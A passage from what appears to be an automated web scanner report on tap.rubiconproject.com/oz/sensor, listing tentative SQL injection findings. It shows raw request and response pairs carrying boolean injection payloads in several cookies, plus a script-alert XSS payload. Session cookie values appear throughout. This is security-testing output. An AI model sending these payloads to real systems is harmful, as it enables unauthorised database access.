Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD'%20and%201%3d2--%20; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:55 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.23. http://tap.rubiconproject.com/oz/sensor [lm cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The lm cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the lm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=12&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,southern:84,billion+cnbc:80,datetime+04:80,union:72,transfer:72,must+click:64,cnbc+welcomes:64,please+respect:64,cnbc+highlights:64,posted+yet:64,cnbc+reserves:64,related+links:64,asia+pacific:56,2011:56,2011+4:48,4+54:48,6+16:48,expiration+datetime:48,special+reports:48,datetime+6:48,16+2011:48,datetime:46,billion:46,transfer+equity:40,datetime+11:40,will+benefit:40,energy+news:40,equity+will:40,union+company:40,04+51:40,burgeoning+u:40,large+midstream:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"'%20and%201%3d1--%20; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=14|4|10|0; rdk=6451/11953; rdk15=0; ses15=11953^3; csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:12:16 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:12:16 GMT; Path=/
Set-Cookie: dq=18|4|14|0; Expires=Fri, 15-Jun-2012 12:12:16 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=12&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,southern:84,billion+cnbc:80,datetime+04:80,union:72,transfer:72,must+click:64,cnbc+welcomes:64,please+respect:64,cnbc+highlights:64,posted+yet:64,cnbc+reserves:64,related+links:64,asia+pacific:56,2011:56,2011+4:48,4+54:48,6+16:48,expiration+datetime:48,special+reports:48,datetime+6:48,16+2011:48,datetime:46,billion:46,transfer+equity:40,datetime+11:40,will+benefit:40,energy+news:40,equity+will:40,union+company:40,04+51:40,burgeoning+u:40,large+midstream:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"'%20and%201%3d2--%20; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=14|4|10|0; rdk=6451/11953; rdk15=0; ses15=11953^3; csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:12:16 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.24. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=18&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC&1%20and%201%3d1--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; cd=false; dq=11|4|7|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0; ses15=11953^1; csi15=3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:07:56 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:07:56 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:07:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=18&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC&1%20and%201%3d2--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; cd=false; dq=11|4|7|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0; ses15=11953^1; csi15=3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:07:56 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.25. http://tap.rubiconproject.com/oz/sensor [put_1185 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The put_1185 cookie appears to be vulnerable to SQL injection attacks. The payloads 18111862'%20or%201%3d1--%20 and 18111862'%20or%201%3d2--%20 were each submitted in the put_1185 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,must+click:64,cnbc+reserves:64,please+respect:64,cnbc+highlights:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+05:56,special+reports:48,datetime+6:48,expiration+datetime:48,16+2011:48,2011+5:48,05+18:48,5+21:48,6+16:48,datetime:46,billion:46,equity+will:40,19+32:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=432589728983648183018111862'%20or%201%3d1--%20; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=18|4|14|0; ses2=11953^2; csi2=3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^7; csi15=3187871.js^5^1308225219^1308226816&3206204.js^2^1308225202^1308225888

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:08:33 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:08:33 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:08:33 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,must+click:64,cnbc+reserves:64,please+respect:64,cnbc+highlights:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+05:56,special+reports:48,datetime+6:48,expiration+datetime:48,16+2011:48,2011+5:48,05+18:48,5+21:48,6+16:48,datetime:46,billion:46,equity+will:40,19+32:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=432589728983648183018111862'%20or%201%3d2--%20; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=18|4|14|0; ses2=11953^2; csi2=3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^7; csi15=3187871.js^5^1308225219^1308226816&3206204.js^2^1308225202^1308225888

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:08:33 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.26. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The put_1197 cookie appears to be vulnerable to SQL injection attacks. The payloads 17119375'%20or%201%3d1--%20 and 17119375'%20or%201%3d2--%20 were each submitted in the put_1197 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=346005016192384311117119375'%20or%201%3d1--%20; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:36 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:11:36 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:11:36 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=346005016192384311117119375'%20or%201%3d2--%20; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:36 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.27. http://tap.rubiconproject.com/oz/sensor [put_1512 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The put_1512 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1512 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

